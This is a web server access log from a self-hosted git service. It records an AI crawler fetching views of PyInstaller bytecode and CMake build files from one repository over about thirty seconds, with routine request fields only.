+[17/Feb/2026:15:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73579] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:15:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11271] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:15:00:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10178] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:00:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9938] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:00:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14339] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:00:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11193] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29808] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29811] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:00:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:00:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10948] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:15:00:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11022] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:00:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16048] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:00:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12010] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:00:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9970] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9937] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10177] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:00:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9940] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:00:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21837] [Gzip 12.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:00:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16401] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9961] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11517] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39744] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9971] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39740] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:01:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10948] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:15:01:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14295] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:01:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:01:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14639] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:01:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11101] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:01:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:01:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14638] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:01:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11099] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10935] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:15:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10947] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:15:01:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14296] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73585] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 